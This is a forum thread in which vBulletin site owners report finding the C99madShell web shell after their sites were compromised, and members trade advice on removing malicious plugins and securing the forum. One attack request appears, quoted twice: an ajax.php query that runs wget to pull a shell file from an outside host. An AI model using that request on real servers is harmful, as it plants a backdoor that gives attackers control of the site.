I upgraded vBulletin 3.8 from 3.7, and now when ever I try to edit subscriptions, this comes up... its a PHP Shell script....

--------------- Added 1232510889 at 1232510889 ---------------

Ok... it was going back to the init.php file, and told me this line


($hook = vBulletinHook::fetch_hook('init_startup')) ? eval($hook) : false;


I commented that line out (//) and it went away....

--------------- Added 1232511838 at 1232511838 ---------------

solved.... error.php

By commenting that line, you are only disabling that hook. It hasn't fixed the hole that allowed the attacker to run the shell in the first place.

No, by SOLVED I meant I removed the script.. (The shell script)

That still does not solve how the attacker got the file there. Unless you know that already too?

am having this problem as well.....When I try to edit the payments manager I get the above msg

!C99madShell v. 2.0 madnet edition!

Software: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5. PHP/5.2.13

This is a trojan, just google for it. You should contact your host ASAP to find out how it got into your account and to remove all traces of it.

Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!

Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!

Tomato, Tomato or Potato, Potato it does not matter, it's malicious and is still something you do not want to see when navigating the admincp or any other part of your site for that matter and tbo I have no clue why you even posted that last snippet of quick whit, nothing to cheer about until you've removed it :erm:.

they get the file on your server by ajax.php - they use it like forum.com/ajax.php?global=wget http://www.examplewebsite.org/c100.txt

Then they process this from here.

I would recommend vbulletin upgrading / securing the ajax.php asap

Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!

A useless discussion on semantics in my view, the poster that asked the question will understand that it is a serious security issue if i use the word "Trojan".

But how would you call an unwanted script that gives an unauthorized person backdoor access to system functions and data?

Right now i have the exactly same problem. Does anyone know how to solve this problem please ? I am running my own dedicated server but since am not good with server management, i do not have any idea about what to do on server side if it's not about a file removing or something like that...

I saw this for the first time on a client's install two or so months ago. None of the vBulletin files were modified and the database was clean so I was stumped at first. It turns out this particular exploit uses vB's plugin/hook system; if you see a strange plugin (note I said plugin, not product), remove it. Then, find out how it got on there. xD

Just read a document on this exploit; bad file permission or upload script setups could allow something like this to happen.

I think Shell is malicious :)

they get the file on your server by ajax.php - they use it like forum.com/ajax.php?global=wget http://www.examplewebsite.org/c100.txt

Then they process this from here.

I would recommend vbulletin upgrading / securing the ajax.php asap
You cannot upload files like that with ajax.php unless someone has already compromised you.

What actually happens is they use sql injection via an unsafe modification to install a plugin on the ajax hook, then use that malicious plugin to install the file.

If you forum directory was properly secured as read only (to apache) then that wget would fail to actually save the file.

How would I get rid of this ive been comprimised as well...

Is it in a folder in FTP is it a CODE I can delete etc

How would I get rid of this ive been comprimised as well...

Is it in a folder in FTP is it a CODE I can delete etc

Contact your Host and/or hire someone to remove it as this is quite nasty and who knows if you have the same edition (you can modify and add/remove code before uploading a script) and is yours in English or Arabic? I've seen this script in three different languages honestly so long story short if your not experienced in this, it's not ideal for you to try and sort yourself unfortunately :(.

Edit: You can try POST #4 (https://www.vbulletin.com/forum/showthread.php/393227-Preventative-How-to-avoid-being-Hacked-by-TeamPS-i-e-p0wersurge?p=2245651&viewfull=1#post2245651) shown in this thread - https://www.vbulletin.com/forum/showthread.php/393227-Preventative-How-to-avoid-being-Hacked-by-TeamPS-i-e-p0wersurge

Look into the PLUGIN MANAGER and check for any suspect plugins installed. I found 4 of them.

This is a period of nasty hacking time.